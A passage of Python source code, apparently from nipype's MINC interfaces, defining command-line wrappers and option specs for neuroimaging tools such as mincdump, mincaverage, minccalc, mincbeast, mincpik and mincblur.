argstr="-ignore_patient_variable",
)
ignore_study_variable = traits.Bool(
desc="Ignore information from the minc study variable.",
argstr="-ignore_study_variable",
)
ignore_acquisition_variable = traits.Bool(
desc="Ignore information from the minc acquisition variable.",
argstr="-ignore_acquisition_variable",
)
ignore_ecat_acquisition_variable = traits.Bool(
desc="Ignore information from the minc ecat_acquisition variable.",
argstr="-ignore_ecat_acquisition_variable",
)
ignore_ecat_main = traits.Bool(
desc="Ignore information from the minc ecat-main variable.",
argstr="-ignore_ecat_main",
)
ignore_ecat_subheader_variable = traits.Bool(
desc="Ignore information from the minc ecat-subhdr variable.",
argstr="-ignore_ecat_subheader_variable",
)
no_decay_corr_fctr = traits.Bool(
desc="Do not compute the decay correction factors", argstr="-no_decay_corr_fctr"
)
voxels_as_integers = traits.Bool(
desc=(
"Voxel values are treated as integers, scale and"
"calibration factors are set to unity"
),
argstr="-label",
)
class ToEcatOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class ToEcat(CommandLine):
"""Convert a 2D image, a 3D volumes or a 4D dynamic volumes
written in MINC file format to a 2D, 3D or 4D Ecat7 file.
Examples
--------
>>> from nipype.interfaces.minc import ToEcat
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> c = ToEcat(input_file=minc2Dfile)
>>> c.run() # doctest: +SKIP
>>> c = ToEcat(input_file=minc2Dfile, voxels_as_integers=True)
>>> c.run() # doctest: +SKIP
"""
input_spec = ToEcatInputSpec
output_spec = ToEcatOutputSpec
_cmd = "minctoecat"
class DumpInputSpec(StdOutCommandLineInputSpec):
input_file = File(
desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
)
output_file = File(
desc="output file",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_dump.txt",
keep_extension=False,
)
_xor_coords_or_header = ("coordinate_data", "header_data")
coordinate_data = traits.Bool(
desc="Coordinate variable data and header information.",
argstr="-c",
xor=_xor_coords_or_header,
)
header_data = traits.Bool(
desc="Header information only, no data.", argstr="-h", xor=_xor_coords_or_header
)
_xor_annotations = ("annotations_brief", "annotations_full")
annotations_brief = traits.Enum(
"c",
"f",
argstr="-b %s",
desc="Brief annotations for C or Fortran indices in data.",
xor=_xor_annotations,
)
annotations_full = traits.Enum(
"c",
"f",
argstr="-f %s",
desc="Full annotations for C or Fortran indices in data.",
xor=_xor_annotations,
)
variables = InputMultiPath(
traits.Str,
desc="Output data for specified variables only.",
sep=",",
argstr="-v %s",
)
line_length = traits.Range(
low=0, desc="Line length maximum in data section (default 80).", argstr="-l %d"
)
netcdf_name = traits.Str(
desc="Name for netCDF (default derived from file name).", argstr="-n %s"
)
precision = traits.Either(
traits.Int(),
traits.Tuple(traits.Int, traits.Int),
desc="Display floating-point values with less precision",
argstr="%s",
) # See _format_arg in Dump for actual formatting.
class DumpOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Dump(StdOutCommandLine):
"""Dump a MINC file. Typically used in conjunction with mincgen (see Gen).
Examples
--------
>>> from nipype.interfaces.minc import Dump
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> dump = Dump(input_file=minc2Dfile)
>>> dump.run() # doctest: +SKIP
>>> dump = Dump(input_file=minc2Dfile, output_file='/tmp/out.txt', precision=(3, 4))
>>> dump.run() # doctest: +SKIP
"""
input_spec = DumpInputSpec
output_spec = DumpOutputSpec
_cmd = "mincdump"
def _format_arg(self, name, spec, value):
if name == "precision":
if isinstance(value, int):
return "-p %d" % value
elif (
isinstance(value, tuple)
and isinstance(value[0], int)
and isinstance(value[1], int)
):
return "-p %d,%d" % (value[0], value[1])
else:
raise ValueError("Invalid precision argument: " + str(value))
return super()._format_arg(name, spec, value)
class AverageInputSpec(CommandLineInputSpec):
_xor_input_files = ("input_files", "filelist")
input_files = InputMultiPath(
File(exists=True),
desc="input file(s)",
mandatory=True,
sep=" ",
argstr="%s",
position=-2,
xor=_xor_input_files,
)
filelist = File(
desc="Specify the name of a file containing input file names.",
argstr="-filelist %s",
exists=True,
mandatory=True,
xor=_xor_input_files,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_files"],
hash_files=False,
name_template="%s_averaged.mnc",
)
two = traits.Bool(desc="Create a MINC 2 output file.", argstr="-2")
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
_xor_verbose = ("verbose", "quiet")
verbose = traits.Bool(
desc="Print out log messages (default).", argstr="-verbose", xor=_xor_verbose
)
quiet = traits.Bool(
desc="Do not print out log messages.", argstr="-quiet", xor=_xor_verbose
)
debug = traits.Bool(desc="Print out debugging messages.", argstr="-debug")
_xor_check_dimensions = ("check_dimensions", "no_check_dimensions")
check_dimensions = traits.Bool(
desc="Check that dimension info matches across files (default).",
argstr="-check_dimensions",
xor=_xor_check_dimensions,
)
no_check_dimensions = traits.Bool(
desc="Do not check dimension info.",
argstr="-nocheck_dimensions",
xor=_xor_check_dimensions,
)
_xor_format = (
"format_filetype",
"format_byte",
"format_short",
"format_int",
"format_long",
"format_float",
"format_double",
"format_signed",
"format_unsigned",
)
format_filetype = traits.Bool(
desc="Use data type of first file (default).",
argstr="-filetype",
xor=_xor_format,
)
format_byte = traits.Bool(
desc="Write out byte data.", argstr="-byte", xor=_xor_format
)
format_short = traits.Bool(
desc="Write out short integer data.", argstr="-short", xor=_xor_format
)
format_int = traits.Bool(
desc="Write out 32-bit integer data.", argstr="-int", xor=_xor_format
)
format_long = traits.Bool(
desc="Superseded by -int.", argstr="-long", xor=_xor_format
)
format_float = traits.Bool(
desc="Write out single-precision floating-point data.",
argstr="-float",
xor=_xor_format,
)
format_double = traits.Bool(
desc="Write out double-precision floating-point data.",
argstr="-double",
xor=_xor_format,
)
format_signed = traits.Bool(
desc="Write signed integer data.", argstr="-signed", xor=_xor_format
)
format_unsigned = traits.Bool(
desc="Write unsigned integer data (default).",
argstr="-unsigned",
xor=_xor_format,
)
max_buffer_size_in_kb = traits.Range(
low=0,
desc="Specify the maximum size of the internal buffers (in kbytes).",
value=4096,
usedefault=True,
argstr="-max_buffer_size_in_kb %d",
)
_xor_normalize = ("normalize", "nonormalize")
normalize = traits.Bool(
desc="Normalize data sets for mean intensity.",
argstr="-normalize",
xor=_xor_normalize,
)
nonormalize = traits.Bool(
desc="Do not normalize data sets (default).",
argstr="-nonormalize",
xor=_xor_normalize,
)
voxel_range = traits.Tuple(
traits.Int,
traits.Int,
argstr="-range %d %d",
desc="Valid range for output data.",
)
sdfile = File(desc="Specify an output sd file (default=none).", argstr="-sdfile %s")
_xor_copy_header = ("copy_header", "no_copy_header")
copy_header = traits.Bool(
desc="Copy all of the header from the first file (default for one file).",
argstr="-copy_header",
xor=_xor_copy_header,
)
no_copy_header = traits.Bool(
desc="Do not copy all of the header from the first file (default for many files)).",
argstr="-nocopy_header",
xor=_xor_copy_header,
)
avgdim = traits.Str(
desc="Specify a dimension along which we wish to average.", argstr="-avgdim %s"
)
binarize = traits.Bool(
desc="Binarize the volume by looking for values in a given range.",
argstr="-binarize",
)
binrange = traits.Tuple(
traits.Float,
traits.Float,
argstr="-binrange %s %s",
desc="Specify a range for binarization. Default value: 1.79769e+308 -1.79769e+308.",
)
binvalue = traits.Float(
desc=(
"Specify a target value (+/- 0.5) for"
"binarization. Default value: -1.79769e+308"
),
argstr="-binvalue %s",
)
weights = InputMultiPath(
traits.Str,
desc='Specify weights for averaging ("<w1>,<w2>,...").',
sep=",",
argstr="-weights %s",
)
width_weighted = traits.Bool(
desc="Weight by dimension widths when -avgdim is used.",
argstr="-width_weighted",
requires=("avgdim",),
)
class AverageOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Average(CommandLine):
"""Average a number of MINC files.
Examples
--------
>>> from nipype.interfaces.minc import Average
>>> from nipype.interfaces.minc.testdata import nonempty_minc_data
>>> files = [nonempty_minc_data(i) for i in range(3)]
>>> average = Average(input_files=files, output_file='/tmp/tmp.mnc')
>>> average.run() # doctest: +SKIP
"""
input_spec = AverageInputSpec
output_spec = AverageOutputSpec
_cmd = "mincaverage"
class BlobInputSpec(CommandLineInputSpec):
input_file = File(
desc="input file to blob", exists=True, mandatory=True, argstr="%s", position=-2
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_blob.mnc",
)
trace = traits.Bool(
desc="compute the trace (approximate growth and shrinkage) -- FAST",
argstr="-trace",
)
determinant = traits.Bool(
desc="compute the determinant (exact growth and shrinkage) -- SLOW",
argstr="-determinant",
)
translation = traits.Bool(
desc="compute translation (structure displacement)", argstr="-translation"
)
magnitude = traits.Bool(
desc="compute the magnitude of the displacement vector", argstr="-magnitude"
)
class BlobOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Blob(CommandLine):
"""Calculate blobs from minc deformation grids.
Examples
--------
>>> from nipype.interfaces.minc import Blob
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> blob = Blob(input_file=minc2Dfile, output_file='/tmp/tmp.mnc', trace=True)
>>> blob.run() # doctest: +SKIP
"""
input_spec = BlobInputSpec
output_spec = BlobOutputSpec
_cmd = "mincblob"
class CalcInputSpec(CommandLineInputSpec):
_xor_input_files = ("input_files", "filelist")
input_files = InputMultiPath(
File(exists=True),
desc="input file(s) for calculation",
mandatory=True,
sep=" ",
argstr="%s",
position=-2,
)
output_file = File(
desc="output file",
genfile=True,
argstr="%s",
position=-1,
name_source=["input_files"],
hash_files=False,
name_template="%s_calc.mnc",
)
two = traits.Bool(desc="Create a MINC 2 output file.", argstr="-2")
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
_xor_verbose = ("verbose", "quiet")
verbose = traits.Bool(
desc="Print out log messages (default).", argstr="-verbose", xor=_xor_verbose
)
quiet = traits.Bool(
desc="Do not print out log messages.", argstr="-quiet", xor=_xor_verbose
)
debug = traits.Bool(desc="Print out debugging messages.", argstr="-debug")
filelist = File(
desc="Specify the name of a file containing input file names.",
argstr="-filelist %s",
mandatory=True,
xor=_xor_input_files,
)
_xor_copy_header = ("copy_header", "no_copy_header")
copy_header = traits.Bool(
desc="Copy all of the header from the first file.",
argstr="-copy_header",
xor=_xor_copy_header,
)
no_copy_header = traits.Bool(
desc="Do not copy all of the header from the first file.",
argstr="-nocopy_header",
xor=_xor_copy_header,
)
_xor_format = (
"format_filetype",
"format_byte",
"format_short",
"format_int",
"format_long",
"format_float",
"format_double",
"format_signed",
"format_unsigned",
)
format_filetype = traits.Bool(
desc="Use data type of first file (default).",
argstr="-filetype",
xor=_xor_format,
)
format_byte = traits.Bool(
desc="Write out byte data.", argstr="-byte", xor=_xor_format
)
format_short = traits.Bool(
desc="Write out short integer data.", argstr="-short", xor=_xor_format
)
format_int = traits.Bool(
desc="Write out 32-bit integer data.", argstr="-int", xor=_xor_format
)
format_long = traits.Bool(
desc="Superseded by -int.", argstr="-long", xor=_xor_format
)
format_float = traits.Bool(
desc="Write out single-precision floating-point data.",
argstr="-float",
xor=_xor_format,
)
format_double = traits.Bool(
desc="Write out double-precision floating-point data.",
argstr="-double",
xor=_xor_format,
)
format_signed = traits.Bool(
desc="Write signed integer data.", argstr="-signed", xor=_xor_format
)
format_unsigned = traits.Bool(
desc="Write unsigned integer data (default).",
argstr="-unsigned",
xor=_xor_format,
)
voxel_range = traits.Tuple(
traits.Int,
traits.Int,
argstr="-range %d %d",
desc="Valid range for output data.",
)
max_buffer_size_in_kb = traits.Range(
low=0,
desc="Specify the maximum size of the internal buffers (in kbytes).",
argstr="-max_buffer_size_in_kb %d",
)
_xor_check_dimensions = ("check_dimensions", "no_check_dimensions")
check_dimensions = traits.Bool(
desc="Check that files have matching dimensions (default).",
argstr="-check_dimensions",
xor=_xor_check_dimensions,
)
no_check_dimensions = traits.Bool(
desc="Do not check that files have matching dimensions.",
argstr="-nocheck_dimensions",
xor=_xor_check_dimensions,
)
# FIXME Is it sensible to use ignore_nan and propagate_nan at the same
# time? Document this.
ignore_nan = traits.Bool(
desc="Ignore invalid data (NaN) for accumulations.", argstr="-ignore_nan"
)
propagate_nan = traits.Bool(
desc="Invalid data in any file at a voxel produces a NaN (default).",
argstr="-propagate_nan",
)
# FIXME Double-check that these are mutually exclusive?
_xor_nan_zero_illegal = ("output_nan", "output_zero", "output_illegal_value")
output_nan = traits.Bool(
desc="Output NaN when an illegal operation is done (default).",
argstr="-nan",
xor=_xor_nan_zero_illegal,
)
output_zero = traits.Bool(
desc="Output zero when an illegal operation is done.",
argstr="-zero",
xor=_xor_nan_zero_illegal,
)
output_illegal = traits.Bool(
desc="Value to write out when an illegal operation is done. Default value: 1.79769e+308",
argstr="-illegal_value",
xor=_xor_nan_zero_illegal,
)
_xor_expression = ("expression", "expfile")
expression = traits.Str(
desc="Expression to use in calculations.",
argstr="-expression '%s'",
xor=_xor_expression,
mandatory=True,
)
expfile = File(
desc="Name of file containing expression.",
argstr="-expfile %s",
xor=_xor_expression,
mandatory=True,
)
# FIXME test this one, the argstr will probably need tweaking, see
# _format_arg.
outfiles = traits.List(
traits.Tuple(
traits.Str,
File,
argstr="-outfile %s %s",
desc=(
"List of (symbol, file) tuples indicating that output should be written"
"to the specified file, taking values from the symbol which should be"
"created in the expression (see the EXAMPLES section). If this option"
"is given, then all non-option arguments are taken as input files."
"This option can be used multiple times for multiple output files."
),
)
)
eval_width = traits.Int(
desc="Number of voxels to evaluate simultaneously.", argstr="-eval_width %s"
)
class CalcOutputSpec(TraitedSpec):
output_file = File(desc="output file", exists=True)
class Calc(CommandLine):
"""Compute an expression using MINC files as input.
Examples
--------
>>> from nipype.interfaces.minc import Calc
>>> from nipype.interfaces.minc.testdata import nonempty_minc_data
>>> file0 = nonempty_minc_data(0)
>>> file1 = nonempty_minc_data(1)
>>> calc = Calc(input_files=[file0, file1], output_file='/tmp/calc.mnc', expression='A[0] + A[1]') # add files together
>>> calc.run() # doctest: +SKIP
"""
input_spec = CalcInputSpec
output_spec = CalcOutputSpec
_cmd = "minccalc"
# FIXME mincbbox produces output like
#
# -5.000000 -5.000000 -5.000000 4.800000 2.800000 8.800000
#
# so perhaps this would be better returned as a pair of Python
# lists instead of sending to an output file?
class BBoxInputSpec(StdOutCommandLineInputSpec):
input_file = File(
desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
)
output_file = File(
desc="output file containing bounding box corners",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s_bbox.txt",
keep_extension=False,
)
threshold = traits.Int(
0,
desc="VIO_Real value threshold for bounding box. Default value: 0.",
argstr="-threshold",
)
_xor_one_two = ("one_line", "two_lines")
one_line = traits.Bool(
desc="Output on one line (default): start_x y z width_x y z",
argstr="-one_line",
xor=_xor_one_two,
)
two_lines = traits.Bool(
desc="""Write output with two rows (start and width).""",
argstr="-two_lines",
xor=_xor_one_two,
)
format_mincresample = traits.Bool(
desc="Output format for mincresample: (-step x y z -start x y z -nelements x y z",
argstr="-mincresample",
)
format_mincreshape = traits.Bool(
desc="Output format for mincreshape: (-start x,y,z -count dx,dy,dz",
argstr="-mincreshape",
)
format_minccrop = traits.Bool(
desc="Output format for minccrop: (-xlim x1 x2 -ylim y1 y2 -zlim z1 z2",
argstr="-minccrop",
)
# FIXME Not implemented, will clash with our parsing of the output?
# Command-specific options:
# Options for logging progress. Default = -verbose.
# -verbose: Write messages indicating progress
# -quiet: Do not write log messages
# -debug: Print out debug info.
class BBoxOutputSpec(TraitedSpec):
output_file = File(desc="output file containing bounding box corners", exists=True)
class BBox(StdOutCommandLine):
"""Determine a bounding box of image.
Examples
--------
>>> from nipype.interfaces.minc import BBox
>>> from nipype.interfaces.minc.testdata import nonempty_minc_data
>>> file0 = nonempty_minc_data(0)
>>> bbox = BBox(input_file=file0)
>>> bbox.run() # doctest: +SKIP
"""
input_spec = BBoxInputSpec
output_spec = BBoxOutputSpec
_cmd = "mincbbox"
class BeastInputSpec(CommandLineInputSpec):
"""
TODO:
Command-specific options:
-verbose: Enable verbose output.
-positive: Specify mask of positive segmentation (inside mask) instead of the default mask.
-output_selection: Specify file to output selected files.
-count: Specify file to output the patch count.
-mask: Specify a segmentation mask instead of the default mask.
-no_mask: Do not apply a segmentation mask. Perform the segmentation over the entire image.
-no_positive: Do not apply a positive mask.
Generic options for all commands:
-help: Print summary of command-line options and abort
-version: Print version number of program and exit
Copyright (C) 2011 Simon Fristed Eskildsen, Vladimir Fonov,
Pierrick Coupe, Jose V. Manjon
This program comes with ABSOLUTELY NO WARRANTY; for details type 'cat COPYING'.
This is free software, and you are welcome to redistribute it under certain
conditions; type 'cat COPYING' for details.
Usage: mincbeast [options] <library dir> <input> <output>
mincbeast -help
Get this example to work?
https://github.com/BIC-MNI/BEaST/blob/master/README.library
2.3 Source the minc-toolkit (if installed):
$ source /opt/minc/minc-toolkit-config.sh
2.4 Generate library by running:
$ beast_prepareADNIlib -flip <ADNI download directory> <BEaST library directory>
Example:
$ sudo beast_prepareADNIlib -flip Downloads/ADNI /opt/minc/share/beast-library-1.1
3. Test the setup
3.1 Normalize your data
$ beast_normalize -modeldir /opt/minc/share/icbm152_model_09c input.mnc normal.mnc normal.xfm
3.2 Run BEaST
$ mincbeast /opt/minc/share/beast-library-1.1 normal.mnc brainmask.mnc -conf /opt/minc/share/beast-library-1.1/default.2mm.conf -same_res
"""
probability_map = traits.Bool(
desc="Output the probability map instead of crisp mask.", argstr="-probability"
)
flip_images = traits.Bool(
desc="Flip images around the mid-sagittal plane to increase patch count.",
argstr="-flip",
)
load_moments = traits.Bool(
desc=(
"Do not calculate moments instead use precalculated"
"library moments. (for optimization purposes)"
),
argstr="-load_moments",
)
fill_holes = traits.Bool(desc="Fill holes in the binary output.", argstr="-fill")
median_filter = traits.Bool(
desc="Apply a median filter on the probability map.", argstr="-median"
)
nlm_filter = traits.Bool(
desc="Apply an NLM filter on the probability map (experimental).",
argstr="-nlm_filter",
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
configuration_file = File(
desc="Specify configuration file.", argstr="-configuration %s"
)
voxel_size = traits.Int(
4,
usedefault=True,
desc=(
"Specify voxel size for calculations (4, 2, or 1)."
"Default value: 4. Assumes no multiscale. Use configuration"
"file for multiscale."
),
argstr="-voxel_size %s",
)
abspath = traits.Bool(
desc="File paths in the library are absolute (default is relative to library root).",
argstr="-abspath",
usedefault=True,
default_value=True,
)
patch_size = traits.Int(
1,
usedefault=True,
desc="Specify patch size for single scale approach. Default value: 1.",
argstr="-patch_size %s",
)
search_area = traits.Int(
2,
usedefault=True,
desc="Specify size of search area for single scale approach. Default value: 2.",
argstr="-search_area %s",
)
confidence_level_alpha = traits.Float(
0.5,
usedefault=True,
desc="Specify confidence level Alpha. Default value: 0.5",
argstr="-alpha %s",
)
smoothness_factor_beta = traits.Float(
0.5,
usedefault=True,
desc="Specify smoothness factor Beta. Default value: 0.25",
argstr="-beta %s",
)
threshold_patch_selection = traits.Float(
0.95,
usedefault=True,
desc="Specify threshold for patch selection. Default value: 0.95",
argstr="-threshold %s",
)
number_selected_images = traits.Int(
20,
usedefault=True,
desc="Specify number of selected images. Default value: 20",
argstr="-selection_num %s",
)
same_resolution = traits.Bool(
desc="Output final mask with the same resolution as input file.",
argstr="-same_resolution",
)
library_dir = Directory(
desc="library directory", position=-3, argstr="%s", mandatory=True
)
input_file = File(desc="input file", position=-2, argstr="%s", mandatory=True)
output_file = File(
desc="output file",
position=-1,
argstr="%s",
name_source=["input_file"],
hash_files=False,
name_template="%s_beast_mask.mnc",
)
class BeastOutputSpec(TraitedSpec):
output_file = File(desc="output mask file", exists=True)
class Beast(CommandLine):
"""Extract brain image using BEaST (Brain Extraction using
non-local Segmentation Technique).
Examples
--------
>>> from nipype.interfaces.minc import Beast
>>> from nipype.interfaces.minc.testdata import nonempty_minc_data
>>> file0 = nonempty_minc_data(0)
>>> beast = Beast(input_file=file0)
>>> beast .run() # doctest: +SKIP
"""
input_spec = BeastInputSpec
output_spec = BeastOutputSpec
_cmd = "mincbeast"
class PikInputSpec(CommandLineInputSpec):
input_file = File(
desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
)
_xor_image_type = ("jpg", "png")
jpg = traits.Bool(desc="Output a jpg file.", xor=_xor_image_type)
png = traits.Bool(desc="Output a png file (default).", xor=_xor_image_type)
output_file = File(
desc="output file",
argstr="%s",
genfile=True,
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s.png",
keep_extension=False,
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
# FIXME not implemented: --verbose
# --fake
# --lookup ==> arguments to pass to minclookup
scale = traits.Int(
2,
usedefault=True,
desc=(
"Scaling factor for resulting image. By default images are"
"output at twice their original resolution."
),
argstr="--scale %s",
)
width = traits.Int(
desc="Autoscale the resulting image to have a fixed image width (in pixels).",
argstr="--width %s",
)
depth = traits.Enum(
8,
16,
desc="Bitdepth for resulting image 8 or 16 (MSB machines only!)",
argstr="--depth %s",
)
_xor_title = ("title_string", "title_with_filename")
title = traits.Either(
traits.Bool(desc="Use input filename as title in resulting image."),
traits.Str(desc="Add a title to the resulting image."),
argstr="%s",
) # see _format_arg for actual arg string
title_size = traits.Int(
desc="Font point size for the title.",
argstr="--title_size %s",
requires=["title"],
)
annotated_bar = traits.Bool(
desc="create an annotated bar to match the image (use height of the output image)",
argstr="--anot_bar",
)
# FIXME tuple of floats? Not voxel values? Man page doesn't specify.
minc_range = traits.Tuple(
traits.Float,
traits.Float,
desc="Valid range of values for MINC file.",
argstr="--range %s %s",
)
_xor_image_range = ("image_range", "auto_range")
image_range = traits.Tuple(
traits.Float,
traits.Float,
desc="Range of image values to use for pixel intensity.",
argstr="--image_range %s %s",
xor=_xor_image_range,
)
auto_range = traits.Bool(
desc="Automatically determine image range using a 5 and 95% PcT. (histogram)",
argstr="--auto_range",
xor=_xor_image_range,
)
start = traits.Int(
desc="Slice number to get. (note this is in voxel coordinates).",
argstr="--slice %s",
) # FIXME Int is correct?
_xor_slice = ("slice_z", "slice_y", "slice_x")
slice_z = traits.Bool(
desc="Get an axial/transverse (z) slice.", argstr="-z", xor=_xor_slice
)
slice_y = traits.Bool(desc="Get a coronal (y) slice.", argstr="-y", xor=_xor_slice)
slice_x = traits.Bool(
desc="Get a sagittal (x) slice.", argstr="-x", xor=_xor_slice
) # FIXME typo in man page? sagittal?
triplanar = traits.Bool(
desc="Create a triplanar view of the input file.", argstr="--triplanar"
)
tile_size = traits.Int(
desc="Pixel size for each image in a triplanar.", argstr="--tilesize %s"
)
_xor_sagittal_offset = ("sagittal_offset", "sagittal_offset_perc")
sagittal_offset = traits.Int(
desc="Offset the sagittal slice from the centre.", argstr="--sagittal_offset %s"
)
sagittal_offset_perc = traits.Range(
low=0,
high=100,
desc="Offset the sagittal slice by a percentage from the centre.",
argstr="--sagittal_offset_perc %d",
)
_xor_vertical_horizontal = ("vertical_triplanar_view", "horizontal_triplanar_view")
vertical_triplanar_view = traits.Bool(
desc="Create a vertical triplanar view (Default).",
argstr="--vertical",
xor=_xor_vertical_horizontal,
)
horizontal_triplanar_view = traits.Bool(
desc="Create a horizontal triplanar view.",
argstr="--horizontal",
xor=_xor_vertical_horizontal,
)
lookup = traits.Str(desc="Arguments to pass to minclookup", argstr="--lookup %s")
class PikOutputSpec(TraitedSpec):
output_file = File(desc="output image", exists=True)
class Pik(CommandLine):
"""Generate images from minc files.
Mincpik uses Imagemagick to generate images
from Minc files.
Examples
--------
>>> from nipype.interfaces.minc import Pik
>>> from nipype.interfaces.minc.testdata import nonempty_minc_data
>>> file0 = nonempty_minc_data(0)
>>> pik = Pik(input_file=file0, title='foo')
>>> pik .run() # doctest: +SKIP
"""
input_spec = PikInputSpec
output_spec = PikOutputSpec
_cmd = "mincpik"
def _format_arg(self, name, spec, value):
if name == "title":
if isinstance(value, bool) and value:
return "--title"
elif isinstance(value, str):
return f"--title --title_text {value}"
else:
raise ValueError('Unknown value for "title" argument: ' + str(value))
return super()._format_arg(name, spec, value)
class BlurInputSpec(CommandLineInputSpec):
input_file = File(
desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
)
output_file_base = File(desc="output file base", argstr="%s", position=-1)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
_xor_kernel = ("gaussian", "rect")
gaussian = traits.Bool(
desc="Use a gaussian smoothing kernel (default).",
argstr="-gaussian",
xor=_xor_kernel,
)
rect = traits.Bool(
desc="Use a rect (box) smoothing kernel.", argstr="-rect", xor=_xor_kernel
)
gradient = traits.Bool(
desc="Create the gradient magnitude volume as well.", argstr="-gradient"
)
partial = traits.Bool(
desc="Create the partial derivative and gradient magnitude volumes as well.",
argstr="-partial",
)
no_apodize = traits.Bool(
desc="Do not apodize the data before blurring.", argstr="-no_apodize"
)
_xor_main_options = ("fwhm", "fwhm3d", "standard_dev")
fwhm = traits.Float(
0,
desc="Full-width-half-maximum of gaussian kernel. Default value: 0.",
argstr="-fwhm %s",
xor=_xor_main_options,
mandatory=True,
)
standard_dev = traits.Float(
0,
desc="Standard deviation of gaussian kernel. Default value: 0.",
argstr="-standarddev %s",
xor=_xor_main_options,
mandatory=True,
)
fwhm3d = traits.Tuple(
traits.Float,
traits.Float,
traits.Float,
argstr="-3dfwhm %s %s %s",
desc=(
"Full-width-half-maximum of gaussian kernel."
"Default value: -1.79769e+308 -1.79769e+308 -1.79769e+308."
),
xor=_xor_main_options,
mandatory=True,
)
dimensions = traits.Enum(
3,
1,
2,
desc="Number of dimensions to blur (either 1,2 or 3). Default value: 3.",
argstr="-dimensions %s",
)
class BlurOutputSpec(TraitedSpec):
output_file = File(desc="Blurred output file.", exists=True)
gradient_dxyz = File(desc="Gradient dxyz.")
partial_dx = File(desc="Partial gradient dx.")
partial_dy = File(desc="Partial gradient dy.")
partial_dz = File(desc="Partial gradient dz.")
partial_dxyz = File(desc="Partial gradient dxyz.")
class Blur(StdOutCommandLine):
"""
Convolve an input volume with a Gaussian blurring kernel of
user-defined width. Optionally, the first partial derivatives
and the gradient magnitude volume can be calculated.
Examples
--------
>>> from nipype.interfaces.minc import Blur
>>> from nipype.interfaces.minc.testdata import minc3Dfile
(1) Blur an input volume with a 6mm fwhm isotropic Gaussian
blurring kernel:
>>> blur = Blur(input_file=minc3Dfile, fwhm=6, output_file_base='/tmp/out_6')
>>> blur.run() # doctest: +SKIP
mincblur will create /tmp/out_6_blur.mnc.
(2) Calculate the blurred and gradient magnitude data:
>>> blur = Blur(input_file=minc3Dfile, fwhm=6, gradient=True, output_file_base='/tmp/out_6')
>>> blur.run() # doctest: +SKIP
will create /tmp/out_6_blur.mnc and /tmp/out_6_dxyz.mnc.
(3) Calculate the blurred data, the partial derivative volumes
and the gradient magnitude for the same data:
>>> blur = Blur(input_file=minc3Dfile, fwhm=6, partial=True, output_file_base='/tmp/out_6')
>>> blur.run() # doctest: +SKIP
will create /tmp/out_6_blur.mnc, /tmp/out_6_dx.mnc,
/tmp/out_6_dy.mnc, /tmp/out_6_dz.mnc and /tmp/out_6_dxyz.mnc.
"""
input_spec = BlurInputSpec
output_spec = BlurOutputSpec
_cmd = "mincblur"
def _gen_output_base(self):
output_file_base = self.inputs.output_file_base
if isdefined(output_file_base):
return output_file_base
else:
base_file_name = os.path.split(self.inputs.input_file)[1] # e.g. 'foo.mnc'
base_file_name_no_ext = os.path.splitext(base_file_name)[0] # e.g. 'foo'
output_base = os.path.join(
os.getcwd(), base_file_name_no_ext + "_bluroutput"
) # e.g. '/tmp/blah/foo_bluroutput'
# return os.path.splitext(self.inputs.input_file)[0] +
# '_bluroutput'
return output_base
def _list_outputs(self):
outputs = self.output_spec().get()
output_file_base = self._gen_output_base()
outputs["output_file"] = output_file_base + "_blur.mnc"
if isdefined(self.inputs.gradient):
outputs["gradient_dxyz"] = output_file_base + "_dxyz.mnc"
if isdefined(self.inputs.partial):
outputs["partial_dx"] = output_file_base + "_dx.mnc"
outputs["partial_dy"] = output_file_base + "_dy.mnc"
outputs["partial_dz"] = output_file_base + "_dz.mnc"
outputs["partial_dxyz"] = output_file_base + "_dxyz.mnc"
return outputs
@property
def cmdline(self):
output_file_base = self.inputs.output_file_base
orig_cmdline = super().cmdline
if isdefined(output_file_base):
return orig_cmdline
else:
# FIXME this seems like a bit of a hack. Can we force output_file
# to show up in cmdline by default, even if it isn't specified in
# the instantiation of Pik?
return f"{orig_cmdline} {self._gen_output_base()}"
class MathInputSpec(CommandLineInputSpec):
_xor_input_files = ("input_files", "filelist")
input_files = InputMultiPath(
File(exists=True),
desc="input file(s) for calculation",
mandatory=True,
sep=" ",
argstr="%s",
position=-2,
xor=_xor_input_files,
)
output_file = File(
desc="output file",
argstr="%s",
genfile=True,
position=-1,
name_source=["input_files"],
hash_files=False,
name_template="%s_mincmath.mnc",
)
filelist = File(
desc="Specify the name of a file containing input file names.",
argstr="-filelist %s",
exists=True,
mandatory=True,
xor=_xor_input_files,
)
clobber = traits.Bool(
desc="Overwrite existing file.",
argstr="-clobber",
usedefault=True,
default_value=True,
)
two = traits.Bool(desc="Create a MINC 2 output file.", argstr="-2")
_xor_copy_header = ("copy_header", "no_copy_header")
copy_header = traits.Bool(
desc="Copy all of the header from the first file (default for one file).",
argstr="-copy_header",
xor=_xor_copy_header,
)
no_copy_header = traits.Bool(
desc="Do not copy all of the header from the first file (default for many files)).",
argstr="-nocopy_header",
xor=_xor_copy_header,
)
_xor_format = (
"format_filetype",
"format_byte",
"format_short",
"format_int",
"format_long",
"format_float",
"format_double",
"format_signed",
"format_unsigned",
)
format_filetype = traits.Bool(
